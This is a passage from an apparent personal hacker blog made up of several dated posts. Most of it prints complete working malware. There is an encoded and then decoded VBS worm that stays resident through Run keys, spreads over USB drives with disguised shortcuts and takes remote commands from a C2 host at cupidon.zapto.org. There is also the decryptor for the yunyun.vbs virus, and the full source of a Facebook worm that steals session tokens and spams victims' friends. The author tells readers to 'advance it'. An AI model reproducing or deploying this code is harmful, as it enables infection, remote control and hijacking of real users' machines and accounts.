2|117|110|92|34|32|38|32|102|110|13|10|102|115|46|68|101|108|101|116|101|70|105|108|101|32|100|114|32|38|32|102|110|32|44|116|114|117|101|13|10|102|115|46|68|101|108|101|116|101|70|105|108|101|32|67|114|101|97|116|101|79|98|106|101|99|116|40|34|83|104|101|108|108|46|65|112|112|108|105|99|97|116|105|111|110|34|41|46|78|97|109|101|83|112|97|99|101|40|38|72|55|41|46|83|101|108|102|46|80|97|116|104|32|38|34|92|34|32|38|32|102|110|32|44|116|114|117|101|13|10|102|111|114|32|101|97|99|104|32|120|120|32|105|110|32|102|115|46|68|114|105|118|101|115|13|10|105|102|32|120|120|46|105|115|114|101|97|100|121|32|116|104|101|110|13|10|105|102|32|120|120|46|70|114|101|101|83|112|97|99|101|32|62|48|32|116|104|101|110|13|10|70|111|114|32|69|97|99|104|32|120|32|73|110|32|102|115|46|71|101|116|70|111|108|100|101|114|40|32|120|120|46|112|97|116|104|32|38|32|34|92|34|41|46|70|105|108|101|115|13|10|79|110|32|69|114|114|111|114|32|82|101|115|117|109|101|32|78|101|120|116|13|10|105|102|32|105|110|115|116|114|40|120|46|110|97|109|101|44|34|46|34|41|32|116|104|101|110|13|10|105|102|32|108|99|97|115|101|40|32|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|40|85|66|111|117|110|100|40|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|41|41|41|60|62|34|108|110|107|34|32|116|104|101|110|13|10|120|46|65|116|116|114|105|98|117|116|101|115|32|61|32|48|13|10|105|102|32|117|99|97|115|101|40|120|46|110|97|109|101|41|32|60|62|32|117|99|97|115|101|40|102|110|41|32|116|104|101|110|13|10|102|115|46|100|101|108|101|116|101|102|105|108|101|40|120|120|46|112|97|116|104|32|38|32|34|92|34|32|38|32|120|46|110|97|109|101|32|38|32|34|46|108|110|107|34|32|41|13|10|101|108|115|101|13|10|102|115|46|100|101|108|101|116|101|102|105|108|101|40|32|120|120|46|112|97|116|104|32|38|32|34|92|34|32|38|32|120|46|110|97|109|101|32|41|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|78|101|120|116|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|110|101|120|116|13|10|119|115|99|114|105|112|116|46|113|117|105|116|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|102|117|110|99|116|105|111|110|32|112|111|115|116|40|99|109|100|32|44|100|97|41|13|10|112|111|115|116|61|34|34|13|10|68|105|109|32|111|13|10|83|101|116|32|111|32|61|32|67|114|101|97|116|101|79|98|106|101|99|116|40|34|77|83|88|77|76|50|46|88|77|76|72|84|84|80|34|41|13|10|111|46|111|112|101|110|32|34|80|79|83|84|34|44|34|104|116|116|112|58|47|47|34|32|38|32|104|111|115|116|32|38|32|34|58|34|32|38|32|112|111|114|116|32|38|34|47|34|32|38|32|99|109|100|44|32|102|97|108|115|101|13|10|111|46|115|101|116|82|101|113|117|101|115|116|72|101|97|100|101|114|32|34|85|115|101|114|45|65|103|101|110|116|58|34|44|32|32|105|110|102|13|10|111|46|115|101|110|100|32|100|97|13|10|112|111|115|116|61|111|46|114|101|115|112|111|110|115|101|84|101|120|116|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|100|105|109|32|120|105|110|102|13|10|102|117|110|99|116|105|111|110|32|105|110|102|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|105|102|32|120|105|110|102|61|34|34|32|116|104|101|110|13|10|100|105|109|32|115|13|10|115|61|34|63|63|34|13|10|115|32|61|32|104|119|100|13|10|105|110|102|32|61|32|105|110|102|32|38|32|115|32|38|32|34|92|34|13|10|115|61|34|63|63|34|13|10|115|61|32|115|104|46|69|120|112|97|110|100|69|110|118|105|114|111|110|109|101|110|116|83|116|114|105|110|103|115|40|34|37|67|79|77|80|85|84|69|82|78|65|77|69|37|34|41|13|10|105|110|102|32|61|32|105|110|102|32|38|32|115|32|38|32|34|92|34|13|10|115|61|34|63|63|34|13|10|115|61|32|115|104|46|69|120|112|97|110|100|69|110|118|105|114|111|110|109|101|110|116|83|116|114|105|110|103|115|40|34|37|85|83|69|82|78|65|77|69|37|34|41|13|10|105|110|102|32|61|32|105|110|102|32|38|32|115|32|38|32|34|92|34|13|10|115|61|34|63|63|34|13|10|83|101|116|32|97|32|61|32|71|101|116|79|98|106|101|99|116|40|34|119|105|110|109|103|109|116|115|58|123|105|109|112|101|114|115|111|110|97|116|105|111|110|76|101|118|101|108|61|105|109|112|101|114|115|111|110|97|116|101|125|33|92|92|46|92|114|111|111|116|92|99|105|109|118|50|34|41|13|10|83|101|116|32|97|97|32|61|32|97|46|69|120|101|99|81|117|101|114|121|32|40|34|83|101|108|101|99|116|32|42|32|102|114|111|109|32|87|105|110|51|50|95|79|112|101|114|97|116|105|110|103|83|121|115|116|101|109|34|41|13|10|70|111|114|32|69|97|99|104|32|97|97|97|32|105|110|32|97|97|13|10|115|61|32|97|97|97|46|67|97|112|116|105|111|110|32|32|13|10|101|120|105|116|32|102|111|114|13|10|78|101|120|116|13|10|105|110|102|32|61|32|105|110|102|32|38|32|115|32|38|32|34|92|48|46|51|92|34|32|38|32|112|105|100|32|32|13|10|120|105|110|102|61|105|110|102|13|10|101|108|115|101|13|10|105|110|102|61|120|105|110|102|13|10|101|110|100|32|105|102|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|102|117|110|99|116|105|111|110|32|72|87|68|13|10|83|101|116|32|97|32|61|32|71|101|116|79|98|106|101|99|116|40|34|119|105|110|109|103|109|116|115|58|123|105|109|112|101|114|115|111|110|97|116|105|111|110|76|101|118|101|108|61|105|109|112|101|114|115|111|110|97|116|101|125|33|92|92|46|92|114|111|111|116|92|99|105|109|118|50|34|41|13|10|83|101|116|32|97|97|32|61|32|97|46|69|120|101|99|81|117|101|114|121|40|34|83|69|76|69|67|84|32|42|32|70|82|79|77|32|87|105|110|51|50|95|76|111|103|105|99|97|108|68|105|115|107|34|41|13|10|70|111|114|32|69|97|99|104|32|97|97|97|32|73|110|32|97|97|13|10|105|102|32|97|97|97|46|86|111|108|117|109|101|83|101|114|105|97|108|78|117|109|98|101|114|60|62|34|34|32|116|104|101|110|13|10|72|87|68|61|32|97|97|97|46|86|111|108|117|109|101|83|101|114|105|97|108|78|117|109|98|101|114|13|10|101|120|105|116|32|102|111|114|13|10|101|110|100|32|105|102|13|10|78|101|120|116|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|70|117|110|99|116|105|111|110|32|80|73|68|13|10|80|73|68|61|48|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|80|73|68|32|61|32|71|101|116|79|98|106|101|99|116|40|34|119|105|110|109|103|109|116|115|58|114|111|111|116|92|99|105|109|118|50|34|41|46|71|101|116|40|34|87|105|110|51|50|95|34|32|38|95|13|10|34|80|114|111|99|101|115|115|46|72|97|110|100|108|101|61|39|34|32|38|32|95|13|10|115|104|46|69|120|101|99|40|34|109|115|104|116|97|46|101|120|101|34|41|46|80|114|111|99|101|115|115|73|68|32|38|32|34|39|34|41|46|80|97|114|101|110|116|80|114|111|99|101|115|115|73|100|13|10|69|110|100|32|70|117|110|99|116|105|111|110|";

@f = split /\|/, $HOUDINI;

foreach $ch (@f) {
print chr($ch);
}

Perl is amazing :)

and here ladies and gentle ducks is the decrypted code, I have
formatted it to make it easier to read.

its a real vbs virus/worm please be careful.

'<[ coded bY njq8 ]>'
On Error Resume Next

dim sh ' shell
set sh = WScript.CreateObject("WScript.Shell")
dim fs ' filesystem
set fs = CreateObject("Scripting.FileSystemObject") 
dim host
host = "cupidon.zapto.org"
dim port
port = 999
dim DR
DR = sh.ExpandEnvironmentStrings("%temp%") & "\"
dim FN
FN = "Servieca.vbs"
dim fh
dim us
us = "~"
ins
dim spl
spl = "jnJnj"
dim i
i = 0

while true
dim a
a = ""
a = split(post("ready", ""), spl)
select case a(0)
case "exc"
dim sa
sa = a(1)
execute sa
case "uns"
uns
end select

wscript.sleep 4000
i = i + 1
if i> 2 then
i = 0
xins
end if
wend

function ins
on error resume next
us= sh.regread("HKCU\njq8")
if us="~" then
if lcase( mid(wscript.scriptfullname,2))=":\" &  lcase(fn) then
us="y"
sh.regwrite "HKCU\njq8",  us, "REG_SZ"
else
us="n"
sh.regwrite "HKCU\njq8",  us, "REG_SZ"
end if
end if
Err.Clear
fs.CopyFile wscript.scriptfullname,dr & fn ,true
set fh = fs.OpenTextFile( dr & fn, 8, false)
if  Err.Number>0 then
wscript.quit
end if
xins
end function

sub xins
on error resume next
sh.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn,  chrw(34) & dr & fn & chrw(34), "REG_SZ"
sh.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn,  chrw(34) & dr & fn & chrw(34), "REG_SZ"
fs.copyfile wscript.scriptfullname,  CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
for each xx in fs.Drives
if xx.isready then
if xx.FreeSpace >0 then
' Removable drive
if xx.drivetype=1 then
if fs.fileexists(xx.path & "\" & fn) then
fs.getfile(xx.path & "\"  & fn).Attributes=0
end if
fs.copyfile dr & fn , xx.path & "\"  & fn,true
For Each x In fs.GetFolder( xx.path & "\" ).Files
wscript.sleep 1
if instr(x.name,".") then
if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
x.Attributes = 2
if ucase(x.name) <> ucase(fn) then
With sh.CreateShortcut(xx.path & "\"  & x.name & ".lnk") 
.TargetPath = "cmd.exe"
.WorkingDirectory = ""
.Arguments = "/c start " & Replace(fn," ", ChrW(34) _
& " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " & exit"
.IconLocation = sh.regread("HKLM\SOFTWARE\Classes\" & sh.regread("HKLM\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
if instr( .iconlocation,",")=0 then
.iconlocation = .iconlocation &",0"
end if
.Save()
end with
end if
end if
end if
Next
end if
end if
end if
next
Err.Clear
end sub

function uns
on error resume next
fh.close
sh.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn
sh.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn
fs.DeleteFile dr & fn ,true
fs.DeleteFile CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
for each xx in fs.Drives
if xx.isready then
if xx.FreeSpace >0 then
For Each x In fs.GetFolder( xx.path & "\").Files
On Error Resume Next
if instr(x.name,".") then
if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
x.Attributes = 0
if ucase(x.name) <> ucase(fn) then
fs.deletefile(xx.path & "\" & x.name & ".lnk" )
else
fs.deletefile( xx.path & "\" & x.name )
end if
end if
end if
Next
end if
end if
next
wscript.quit
end function

function post(cmd ,da)
post = ""
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "POST","http://" & host & ":" & port &"/" & cmd, false
o.setRequestHeader "User-Agent:",  inf
o.send da
post = o.responseText
end function

dim xinf
function inf
on error resume next
if xinf="" then
dim s
s = "??"
s = hwd
inf = inf & s & "\"
s = "??"
        s = sh.ExpandEnvironmentStrings("%COMPUTERNAME%")
inf = inf & s & "\"
s = "??"
s = sh.ExpandEnvironmentStrings("%USERNAME%")
inf = inf & s & "\"
s = "??"
Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set aa = a.ExecQuery ("Select * from Win32_OperatingSystem")
For Each aaa in aa
s = aaa.Caption  
exit for
Next
inf = inf & s & "\0.3\" & pid  
xinf = inf
else
inf = xinf
end if
end function

function HWD
Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set aa = a.ExecQuery("SELECT * FROM Win32_LogicalDisk")
For Each aaa In aa
if aaa.VolumeSerialNumber<>"" then
HWD = aaa.VolumeSerialNumber
exit for
end if
Next
end function

Function PID
PID = 0
on error resume next
PID = GetObject("winmgmts:root\cimv2").Get("Win32_" &_
"Process.Handle='" & _
sh.Exec("mshta.exe").ProcessID & "'").ParentProcessId
End Function

to keep a list of infected systems njq8 sends calls ready on
cupidon.zapto.org port 999


enjoy and wicked hacking.

2012/06/26

dot nerd is mine, dot geek is mine. Leading the nerdom to Freedom

Hi

Long time no blog :D, I have been having a fantastic awesomest time. To recap am now married (surprised :)
and I have a son handsome little hacker, and he *loves* OpenBSD and likes drooling on
mummy's laptop.

Anyway, I have been messing with BIND for a while now and I must say if you don't play with
these before you die you would *die* in vain. I have researched on making the web faster in .gh
DNS may seem like a very little performance upgrade and many argue that there is the google DNS well
apart from the fact that it sucks and can be a very dangerous tracking tool, how would hackers like
myself ever learn the sweet hardcore *very* fundamental intertube laws? huh huh!

Now on my travels through named(8), named.conf(5) and rndc(8), etc I taught up an idea that was
in 2009 to create a TLD called .nerd for all teh nerds in the world free then I was told that some one(s)
is controlling some root servers ICANN bastards, anyways so I thought to myself how do I laudarch
make my fellow nerds and geeks share their own custom domain names well I bought two IPs and
the source was with me.

So today I present you with two DNS IP addresses that ye *must* use in order to follow this order
use this as your resolver its a little faster than google's 8.8.8.8 and 8.8.4.4 at least from Ghana and I have
tried almost all the ISPs. Also you can resolve .nerd and .geek TLD names, if you have DNS servers please
forward you .nerds to my servers as they are the parent now.

The IPs are
72.52.97.76
72.52.97.109

Please try these and let me know if you like it or any issues you are facing or ideas you have, also registering .nerd names would be up in about a week from now please check http://qremiaevolution.org for more info.

To test the DNS once you have added the IPs to your systems try accessing
http://laudarch.nerd and http://laudarch.geek should you want to use .nerd and .geek nameservers use
ns1.nerd
ns2.nerd
OR
ns1.geek
ns2.geek


laterz

REMEBER TO FORWARD .NERD AND .GEEK

2011/11/19

Commercial Coding Pt2

Well as the title says this is in reference to my old blog post of coding commercially, well it sucks I have to deal with .NET/c# VB.NET Java, I wake in the middle of the night screaming no no not the VM please let me talk to the hardware please, am scaring the shit out of my wife and my mum is getting pissed cause am always on her windows desktop, reversing something or making some guy or company happy with .NET :/ any ways its shit.

2011/07/22

Reversing the 'yunyun.vbs' virus

Hello I have been bored tired and coding :) as usual. I got a pen drive some time last
year and I realized there was too many 'Thumb.db' files so I vi Thumb.db
and guess what I saw
'www.muslimah.or.id;==================================== my name:Yuyun 1.0

' ============================
On Error Resume Next
Dim fso, ws
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.Shell")
Set sh = CreateObject("Shell.application")
Q=WScript.ScriptFullName
tmp=fso.GetSpecialFolder(2)
tn=fso.GetTempName
tmpt=tmp+"\"+tn
Set swt=WScript.Arguments
If swt.Count>0 Then...

Yes that is the yunyun alright coded in Microsoft VBS then I got interested
in the encrypted part of the code, I want to see whats in there.
Te Encryption and decryption routine is using XOR which means its the same
algorithm in and out. Here is the en/decryption routine

hsl=""
For v=1 To Len(isiQ)
t=Asc(Mid(isiQ,v,1))
hsl=hsl+Chr(t Xor 7)
Next

As you can see this is very simple so I wrote a little perl script to decrypt

#!/usr/bin/perl

use strict;
use warnings;

my $vir;
my @vx;
my $line;
my $i;

open (VIR, "+<yunyun.vbs") ||die( "noopeno :(");
while (<VIR>) {
  $line++;
  if (($line eq 47) || ($line > 47)) {
    $vir .= $_;
  }
}
close (VIR);

@vx = split(/ */, $vir);

foreach $i (@vx) {
  print chr(ord($i) ^ 7);
}

I have made it simpler so anyone can learn from it.
Any ways so with that the mystery was unveiled and then mystery 2
There's a part the needs formatting and this virus/worm is really cool at handling
newlines. Anyway you need to format it then translate it here's the code to format

$adv = 'Yuyun Ver 1.0 ^_^!==================>>Bukan dari tulang ubun ia dicipta>karna berbahaya membiarkannya dalam sanjung dan puja>tak juga dari tulang kaki>karna nista membuatnya diinjak dan diperbudak>tapi dari tulang rusuk bagian kiri>dekat ke hati untuk disayangi>dekat ke tangan untuk dilindungi>>(dikutip dr: Agar Bidadari Cemburu Padamu)>>>""Janganlah kamu bersikap lemah, dan janganlah (pula) kamu bersedih hati, padahal kamulah>orang-orang yang paling tinggi (derajatnya), jika kamu orang-orang yang beriman."">(QS. Ali Imran:139)>>>Katakanlah kepada orang laki-laki yang beriman: ""Hendaklah mereka menahan pandanganya, >dan memelihara kemaluannya; yang demikian itu adalah lebih suci bagi mereka, >sesungguhnya Allah Maha Mengetahui apa yang mereka perbuat."" (QS. An Nur:30)>>Katakanlah kepada wanita yang beriman: ""Hendaklah mereka menahan pandangannya, >dan kemaluannya, dan janganlah mereka menampakkan perhiasannya, kecuali yang >(biasa) nampak dari padanya. Dan hendaklah mereka menutupkan kain kudung >kedadanya...."" (QS. An Nur:30)>>Sorry I just Nitip Print thok....Ndak pa2 khan^_^!  www.muslimah.or.id >>Hai anak Adam, sesungguhnya Kami telah menurunkan kepadamu >pakaian untuk menutup auratmu dan pakaian indah untuk perhiasan.>Dan pakaian takwa itulah yang paling baik. Yang demikian itu adalah >sebahagian dari tanda-tanda kekuasaan Allah, mudah-mudahan mereka selalu ingat.(Al-Araf:26)';


$adv =~ s/\>/\n/go;

print $adv;


Ok so uhm that's that, I have more virii/worms but take this for starters
Oh and if anyone has the 'stuxnet' vorm please let me have a binary copy
in tar.gz format.

Next time.

2011/05/06

Facebook Worm

Hello its been really long and a lot of things have happened, anyways I would tell you about the later.

What I want to talk about now is a facebook work I got a couple of days ago
I received a mail from a facebook friend and it had a very suspicious title


"
This will leave you speechless)
http://www.facebook.com/pages/Bin-Laden-Execution-Video/128399103901791
Osama Bin Laden EXECUTION Video!
Navy Seals raid Bin Ladens hideout and execute him!
"

weird huh even CNN didn't show a video so how come this group has it.
The page has been currently re moved. Its funny when these things happen
and people fall for it anyways. it had instructions on copy and paste a javascript
code in your address bar after you are logged in to facebook.

The interesting thing about this worm is how it spreads
it uses the "stupidity" of Humans. Yes stupidity!

I and my brother tried designing a worm on facebook once and we came up
with different algorithms on how to spread using apps mailling
and posting comments, and this all could not be automatic, I even came up
with mozilla extensions to do the job.


The future of worms and viruses is social networking, I watched as the group
grew from 8,000 to 60,000+ in less than two hours now that is power given the
intelligence of the average joe and jane this would work for the next 10 to 15
years.

I copied the javascript code that spread on the victims wall and profile to the
victim's friends et al.

below is the code, learn from it advance it and be wise :)


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// KuNG FU JS v.1  20yrsplus.info
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');

function readCookie(name) {
 
 var nameEQ = name + "=";
 var ca = document.cookie.split(';');
 for(var i=0;i < ca.length;i++) {
  var c = ca[i];
  while (c.charAt(0)==' ') c = c.substring(1,c.length);
  if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
 }
 return null;

}

var user_id = readCookie("c_user");


// Setup some variables

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;


// Multiple URL Shorteners

var shortArray = new Array(
      "http://ow.ly/4LNpd",
      "http://clickily.ws/zyaeom"
     );

var shortUrl = shortArray[Math.floor(shortArray.length*Math.random())];

// Chat message variables

var this_chat = "See the Osama Bin Laden EXECUTION Video! facebook.com/pages/Bin-Laden-Execution-Video/207043242659899?";
var prepared_chat = encodeURIComponent(this_chat);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Post Link to friends walls
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var token = Math.round(new Date().getTime() / 1000);

var http1 = new XMLHttpRequest();

var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";

var params1 = "";
http1.open("GET", url1+"?"+params1, true);
http1.onreadystatechange = function() {//Call a function when the state changes.

 if(http1.readyState == 4 && http1.status == 200) { // If state = success
  
  var response1 = http1.responseText;
  
  response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
  response1 = JSON.parse(response1); // Convert the response to JSON
  
  //alert(response4.toSource());
  
  var count = 0;
  
  for(uid in response1.payload.entries){
   
   if(count < 400){
    
    //alert("SENT TO "+response1.payload.entries[count].uid);

    // Loop to send messages
   
    // New XMLHttp object
    var httpwp = new XMLHttpRequest();
       
    var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
    var randLink = new Array("http://www.facebook.com/pages/Bin-Laden-Execution-Video/219092901450281?", "http://www.facebook.com/pages/Bin-Laden-Execution-Video/128399103901791?");
    var statusmessage="This will leave you speechless";
    var title="Osama Bin Laden EXECUTION Video!";
//    var link="http://clickily.ws/e4lqeg?http://clickily.ws/y2ls36?";
    var link = randLink[Math.floor(randLink.length*Math.random())];
    var description="Navy Seals raid Bin Ladens hideout and execute him! ";
    var picture="http://cooldadssz.co.cc/laden.png";
    
    var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";
    
    httpwp.open("POST", urlwp, true);
    
    //Send the proper header information along with the request
    
    httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    httpwp.setRequestHeader("Content-length", paramswp.length);
    httpwp.setRequestHeader("Connection", "keep-alive");     
    
    httpwp.onreadystatechange = function() { //Call a function when the state changes.
     if(httpwp.readyState == 4 && httpwp.status == 200){
      //alert(http.responseText);
      //alert('buddy list fetched');
     }

    }

    httpwp.send(paramswp);
 
   }

   count++; // increment counter
  
  }
    
  http1.close; // Close the connection
  
  
  
 }
 
}

http1.send(null);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Hide chat boxes
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var hide = document.getElementById('fbDockChatTabSlider');

hide.style.display = "none";


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Get online friends and send chat message to them
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http3 = new XMLHttpRequest();

var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
http3.open("POST", url3, true);

//Send the proper header information along with the request
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-length", params3.length);
http3.setRequestHeader("Connection", "close");

http3.onreadystatechange = function() {//Call a function when the state changes.
 if(http3.readyState == 4 && http3.status == 200) {
  
  var response3 = http3.responseText;
  
  response3 = response3.replace("for (;;);", "");
  response3 = JSON.parse(response3);
  
  var count = 0;
  
  for(property in response3.payload.buddy_list.nowAvailableList){
   
   if(count < 100){
    
    // Loop to send messages
   
    // New XMLHttp object
    var httpc = new XMLHttpRequest();
    
    // Generate random message ID
        
    var msgid = Math.floor(Math.random()*1000000);
    
    var time = Math.round(new Date().getTime() / 1000);
    
    var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
    var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
    httpc.open("POST", urlc, true);
    
    //Send the proper header information along with the request
    httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    httpc.setRequestHeader("Content-length", paramsc.length);
    httpc.setRequestHeader("Connection", "close");
    
    httpc.onreadystatechange = function() { //Call a function when the state changes.
     if(httpc.readyState == 4 && httpc.status == 200){
      //alert(http.responseText);
      //alert('buddy list fetched');
     }
    }
    httpc.send(paramsc);
 
   }
   
   //alert(property);
   count++; // increment counter
  
  }
  
  http3.close; // Close the connection
  
 }
}
http3.send(params3);







/*
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIVEAWAY
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http4 = new XMLHttpRequest();

var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params4 = "fbpage_id=193321447379497&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
 if(http4.readyState == 4 && http4.status == 200) {
   
  http4.close; // Close the connection
  
 }
}
http4.send(params4);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIft
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http5 = new XMLHttpRequest();

var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params5 = "fbpage_id=182116595173798&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http5.open("POST", url5, true);

//Send the proper header information along with the request
http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http5.setRequestHeader("Content-length", params5.length);
http5.setRequestHeader("Connection", "close");

http5.onreadystatechange = function() {//Call a function when the state changes.
 if(http5.readyState == 4 && http5.status == 200) {
   
  http5.close; // Close the connection
  
 }
}
http5.send(params5);
*/

//document.getElementById('susta').style.display="none"; 
document.getElementById('contentArea').innerHTML="
< center>
< img src="http://www.hindustantimes.com/images/loading_gif.gif" />;
Please wait...";
var endArray = new Array("184.171.167.195", "67.23.246.232", "174.140.165.27", "74.63.214.230");


var ending = endArray[Math.floor(endArray.length*Math.random())];
setTimeout("window.location = 'http://'+ending+'/end.php';", 15000); 

As you can see this worm was written very well with everything happening in the background
thanks to the power of AJAX.

Am going to take time and fully reverse this and add comments on how to extend until then am writing something else :)
oh have to post avirii I have been reversing for some time now :)

2010/09/24

Commercial Coding

At the google conference I spoke to a couple of the google guys and lady ^^
and they all suggested I step into the future and code in more commercial
languages I think I want to code there(commercially) which means no more
pushing OBSD on clients servers, no more C/ASM/Perl/ksh and all those
UNIXy stuff :( except for personal projects ^^

Well lets see how it goes.

2010/09/08

Google Appengine and my slacking attitude ^_^

When we went to the Google Dev conference it seemed like appengine
and KML were the things that really interested me, so when I got
home it was my singular honor to crawl the whole project for bugs
and ways to *hack* up the google appengine to my disappointment

the appengine didn't allow custom 404 handlers so I had to mess
with the regex for page request handling and got this:

('/.*', hnd404) 

now that looks like an awesome hack doesn't it NO and yes you know why
because it happens that this means I have to handle everything and I mean
everything from requests like http://www.foo.com/images/bar.png

this means I have to either hardcode or automated file search and display
and also custom handlers like facebook's http://www.foo.com/user to show
user's profile or something of that sort.

Hard coding means something like this


class hnd404(webapp.RequestHandler):
     def get(self):
        request = self.request.uri split_request = request.split("/")
        # now I can do 
        if split_request[3] == 'images':
               #load file which is 
               file = request.split("/")
               path = os.path.join(os.path.dirname(__file__), 'images', file[len(file)-1])
               self.response.out.write(open(path, 'rb').read())
        else:
             self.response.out.write("404 Error by laudarch for " + "'" + split_request[3] + "' Not Found ;p"

Looks extremely cool doesn't it ^^ but then won't you have security
problems with this? what if someone requests for ../../../../../../etc/passwd O_O
what are you going to do then? beg google for mercy and help?
yep I know it can't be possible if we are doing
path = os.path.join(os.path.dirname(__file__),...
Because this tells appengine from my current directory etc but lets
skip that argument it will take pages to explain *potential* issues
with that technique and the fact that it sucks.
It sucks!! yep it does because you will have to handle all that
BS am still working on a better format and have seen some cool ideas
but then that brings us to my slacking :(

I don't have enough *time*, am a beginner diff boy for OpenBSD and
am *yet* to send a diff am working on a payment system, a wifi system,
an SHS Graduate government project, etc so
am in nedd of more time and not to talk of hardware and phreaking hehe
and security scans which I should be blogging about;
University of Ghana comes to mind after their funny sweep of the
viagra ads and not blocking the sec hole in their site suckers just
ask for help hehe.

I have like five appengine projects on my laptop that is waiting to
